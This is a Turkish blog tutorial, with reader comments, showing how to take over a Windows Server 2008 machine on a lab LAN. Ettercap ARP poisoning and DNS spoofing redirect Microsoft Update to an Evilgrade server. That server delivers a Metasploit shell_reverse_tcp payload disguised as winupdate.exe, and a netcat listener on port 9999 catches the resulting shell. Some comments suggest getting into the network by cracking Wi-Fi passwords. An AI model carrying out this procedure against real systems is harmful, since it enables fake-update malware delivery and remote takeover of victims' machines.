• Kategori: Güvenlik
  • Eyüp ÇELİK
  • Gösterim: 9902

MITM Saldırısı ile Windows Server 2008 Hacking

Merhaba arkadaşlar. Bu makalemizde “MITM (Man in The Middle – Ortadaki Adam)” saldırısı yaparak Windows Server 2008 işletim sistemlerinin hacklenebilmesini konu alacağız. Yapacağımız işlem, “DNS Spoof” ve “MITM” saldırısını uygulamalı örnek ile pekiştirecektir.

Senaryo 1: Saldırgan, networkte bulunan bir Windows Server 2008 işletim sistemini hedef almaktadır. Bu Windows 2008 (kurban) işletim sistemi Microsoft Update (http://update.microsoft.com) web sitesinden bir update paketi indirmek istediğinde, bizim oluşturmuş olduğumuz zararlı kodları indirerek çalıştıracak. Bu zararlı kodlar sayesinde Windows Server 2008 işletim sisteminin yönetimini ele geçireceğiz.

Araç ve gereçler:

·         Kali Linux (Ya da BackTrack 5 R2- R3)

·         Windows Server 2008

·         Evilgrade

·         Ettercap

·         Netcat (nc)

Kali Linux’u açarak networkte iletişim kuracak halde olmasını sağlayınız (Bu makale Kali Linux kullanıldığı varsayılarak hazırlanmıştır). Bu işlemi kendi laboratuvarımızı kullanarak yapacağımız için,  Windows Server 2008 ile Kali Linux arasında NAT veya Bridget ağ kartının olması gerekmektedir. NAT ve Bridget ağ kartı eklemek için BackTrack 5 Kurulumu adresinde bulunan makaleyi takip edebilirsiniz.

Resim-01

Bu makale boyunca saldırganın ip adresi (Kali Linux) Resim-01’deki gibi 192.168.88.129 olacaktır.

Resim-02

Bu makale boyunca kurbanın ip adresi (Windows Server 2008) Resim-02’deki gibi 192.168.88.133 olacaktır.

Kali Linux’u açıp “terminal”i çalıştıralım. “evilgrade” yazarak enter ile devam edelim ve ya “Alt – F2” tuş kombinasyonu ile uygulama çalıştır ekranını açarak “evilgrade” yazarak “çalıştır”ı tıklayalım.

Resim-03

Evilgrade Resim-03 gibi açılacaktır. Evilgrade içerisinde “DNS kandırısı (DNS Spoof)” için kullanmak üzere 63 adet modül bulunmaktadır. Biz sahte Windows Update paketleri hazırlayacağımız için “winupdate” modülünü kullanacağız.

Resim-04

“configure winupdate” komutu ile “winupdate” paketini kullanacağımızı ve onu konfigüre edeceğimizi belirtiyoruz.

Resim-05

“Show options” komutu ile konfigüre edeceğimiz modülün özellikleri Resim-06’daki gibi görünecektir.

·         VirtualHost: Bu kısım DNS spoof yapmamız gereken adresleri göstermektedir. DNS spoof işlemini yaptıktan sonra kullanıcı update.microsoft.com adresine girdiğinde bizim belirtmiş olduğumuz IP adresine yönlenecektir.

·         Agent: Kurbana göndereceğimiz zararlı dosyamızın yolu olacak şekilde ayarlanmalıdır.

VirtualHost kısmını ayarlamak için yeni bir terminal ekranı açarak spoof edeceğimiz DNS adreslerini Kali Linux’un IP adresleri ile değiştirmemiz gerekmektedir.

Resim-06

“pico /usr/share/ettercap/etter.dns” komutu ile spoof edeceğimiz DNS adreslerini belirtmek için etter.dns dosyasını pico editörü ile açıyoruz.

Resim-07

Resim-05’te bulunan adresleri Resim-07’deki gibi pico editörü ile etter.dns dosyasına yazıyoruz. Örneğin windowsupdate.microsoft.com adresi için “A” kaydı girerek IP adresi olarak ta 192.168.88.129 yani Kali Linux’un IP adresini belirtmişiz. Kullanıcı spoof işleminden sonra windowsupdate.microsoft.com adresine girdiğinde 192.168.88.129 adresine yönlenecektir. DNS adreslerini girdikten sonra “CTRL + 0” ile değişikliği etter.dns dosyasına yazıyoruz ve “CTRL + X” ile pico editöründen çıkıyoruz.

Ardından evilgrade ekranına geri dönerek “agent”ımızı konfigüre etmemiz gerekiyor.

Resim-08

“set agent” komutu ile zararlı yazılımımızı oluşturup agent olarak atamamız gerekmektedir (Terminal ekranında bu komut tam görünmüyor. Terminal ekranında bir sorun var sanırım.) Bunun için set agent ‘[“/opt/metasploit/apps/pro/msf3/msfpayload windows/shell_reverse_tcp LHOST=192.168.88.129 LPORT=9999 X > <%OUT%>/tmp/winupdate.exe<%OUT%>”]’ komutunu giriyoruz. Bu komut ile Metasploit’in payloadlarından “windows/shell_reverse_tcp” payload’ını kullanacağımızı, bu payload’ın LHOST ip adresinin (geri dönüş ip adresi) 192.168.88.129 (Kali Linux’un IP Adresi) ve LPORT (geri dönüş portunun) 9999 olduğunu, X > komutu ile de bunu /tmp dizininde winupdate.exe adında oluşturmasını söylüyoruz. Böylece shell_reverse_tcp payloadı /tmp dizininde winupdate.exe adında bir exe dosyası haline gelecektir.

Resim-09

Bu işlemin hemen ardından “start” komutu ile evilgrade’i başlatıyoruz. Evilgrade başladığında “[DNSSERER] – DNS Server Ready. Waiting for Connections” yazacaktır. Bu durumda evilgrade başarılı bir şekilde başlamış ve kurbanın sunucuya bağlanması bekleniyor diye anlayabiliriz.

“ALT + F2” tuş kombinasyonu ile veya yeni bir terminal ekranı açıp, “ettercap –G” komutu ile ettercap’in grafiksek ara yüzüne erişiyoruz.

Resim-10

Ettercap açıldıktan sonra “Sniff” menüsünde bulunan “Unified sniffing”i seçiyoruz. Bu seçeneği seçtiğimizde bize hangi ağ kartını Sniff etmek istediğimizi soracaktır. İlgili ağ kartımızı (eth0, eth1, wlan0 vb) seçerek ilerliyoruz.

Resim-11

Plugins menüsünden “Manage the Plugins”i tıklıyoruz. Plugins menüsü Resim-11’deki gibi açılacaktır. Buradan “dns_spoof”u çift tıklıyayarak dns spoofing yapacağımızı belirtiyoruz. “dns_spoof”u çift tıkladığımızda sol tarafta bir yıldız (*) görünecektir.

Resim-12

Hosts menüsünden “Scan for hosts”u seçerek networkte bulunan cihazları tespit etmesini sağlıyoruz.

Resim-13

MITM menüsünden “ARP poisoning”i seçiyoruz. Karşımıza Resim-13’teki gibi bir ekran gelecek. Bu ekranda en üstteki seçenek olan “Sniff remote connections”ı seçip tamam diyoruz.

Resim-14

Bu işlemlerin ardından Start menüsünden “Start sniffing” ile MITM saldırısı başlatıyoruz.

Geriye tek bir işlem kaldı. Kullanıcı oluşturduğumuz sahte update web sitesinden indireceği zararlı yazılımı çalıştırdığında, reverse connection yapan payload’ın gelen isteklerini kabul ederek yönetimi ele almamız. Bunun için de “Netcat” kullanacağız.

Resim-15

Yeni bir terminal ekranı açarak “nc –l –v –p 9999” komutunu yazıyoruz. Bu komut payload oluştururken LPORT olarak belirttiğimiz 9999 portunu dinleyecek ve bir bağlantı gelmesi durumunda onu üzerimize almamızı sağlayacaktır.

Resim-16

Kurban http://update.microsoft.com adresine girdiğinde Resim-16 ekranı ile karşılaşacaktır. Kullanıcının update yapabilmesi için “Download and Install Now” butonuna basması gerekiyor. Kullanıcı bunu tıkladığında oluşturduğumuz payload yüklenecektir.

Resim-17

Kurban oluşturduğumuz payloadı açtığında Resim-17’deki gibi Netcat ile yönetimi ele geçirmiş olacağız. Konu ile ilgili videoyu aşağıdan seyredebilirsiniz.  

Bir sonraki makale MITM saldırısı ile Server 2012 Hacking ve Evilgrade modüllerinin detaylı kullanımını konu alacaktır. Güvenli günler.

Comments

-2 Guest 30-07-2013 21:17 #1
Asıl soru networke nasıl giricez :) tüm videolar network
Quote
0 Guest 30-07-2013 21:31 #2
Merhabalar.

Bunun birçok yolu vardır. Trojan, RDP vb yöntemler kullanılabilir. Bunlar yasal olmadığı için senaryoya dahil edilmedi.
Quote
0 Guest 31-07-2013 14:57 #3
Sonuçta hedef bir sistem belirledik mesela www.xx.com ip scan yaptık network belirledik felan ee bu kisinin kim oldugunu nerde bilicez :) trojanı ve bir payloadı kime yediricez ? hadi diyelim web sitede scriptte bir acık bulduk shell attık ordan çalıştır felan ee buna gerek kalmicakki o zaman local root expler mevcut onlada halledilebilir istenilen şey ?
Quote
-3 Guest 03-08-2013 12:19 #4
Eyüp abi emeğine sağlık gerçekten çok güzel makale bu konda bilgim biraz daha arttı. Bence DNS zehirlenmenin ne kadar önemli oldğun herkes ilerde görecek en büyük en güvenlir sistemlerin dahi bu açığa karşı bir zafı olduğu aşikar olacak. Yandex'te bunun bi örnegini gördük
Quote
-2 Guest 15-09-2013 01:00 #5
Bu saldırı kurbanla aynı LAN içerisinde bulunmayı gerektirdiğinden web sitelerine karşı yapılamaz. Daha çok bireysel kullanıcılara karşı kullanılabilir. Umarım yardımcı olabilmişimdir :)
Quote
+2 Guest 20-10-2013 23:35 #6
Merhabalar,

Burda bahsedilen yöntem local networkte (yerel ağda) gerçekleştirilebilecek bir saldırı yöntemidir. Payload, trojan vb zararlı yazılımın yüklendiği yahut yükleneceği bilgisayar iç ağ olduğundan çıkartılabilir :)
Quote
-2 Guest 20-10-2013 23:36 #7
Teşekkürler, benden hızlı davrandınız :)
Quote
-2 Guest 20-10-2013 23:39 #8
Merhabalar,

Teşekkür ederim. Kesinlikle haklısın. Çok büyük sistemler DNS zayıflıkları yüzünden hacklendi (Bknz. TürkGüvenliği'nin Zone-H kayıtları) ve bu saldırılar DNS konusunun önemini arttırdı.
Quote
0 Guest 07-11-2013 09:51 #9
Merhabalar Eyüp hocam,

Yazılarınıza hayran kaldım. Gerçekten işin ehlisiniz.

Ağa nasıl gireceğini soran arkadaşa vermek istediğim cevap ise;

Eğer ağda Wireless mevcutsa şifresini ele geçirip şirket ağına girdikten sonra bu işlemi uygulayabilirsin.
Quote
+2 Guest 03-01-2014 16:16 #10
Eyüp abi şu masaüstünün zengiligine bak hele maşallah :) Özellikle O Hacking klasörü bir elime geçse ne güzel olurdu Allah bilir kaç yılın emeği var içinde :)
Quote
+2 Guest 22-04-2014 18:52 #11
Merhaba

Bende etter.dns'ye girdikden sonra windowsupdate.microsoft.com çıkmıyor sebebi nnat veya bridget ağ kartına eklemememden dolayımı oluyor
Quote
0 mrbiyik 26-08-2016 01:33 #12
Alıntılandı Guest:
Merhaba

Bende etter.dns'ye girdikden sonra windowsupdate.microsoft.com çıkmıyor sebebi nnat veya bridget ağ kartına eklemememden dolayımı oluyor


Etter.dns programın bu adamı yönlendireceği kayıtlar yer alıyor siz de oraya bir A kaydı ekleyebilirsiniz(google:DNS A KAYDI). Ayrıca yine yemeyebilir. Çünkü büyük kurumlar ve en basitinden sizin evinizdeki bilgisayar sürekli kendi cacheini tutuyor bu yüzden hedef bilgisayarın kendi deposunun(google:FLUSHDNS) boş olduğundan emin olun ki sorgu fizikselden dışarı çıksın siz de spoof edebilin...
Quote

Yorum ekle


Güvenlik kodu Yenile

Bookmaker betfair Bonus review by ArtBetting.co.uk

Bookmaker bet365 review by ArtBetting.co.uk

Germany bookmaker b.artbetting.de review by ArtBetting.de

Bookmaker Greece BET365 review by ArtBetting.gr

Back to top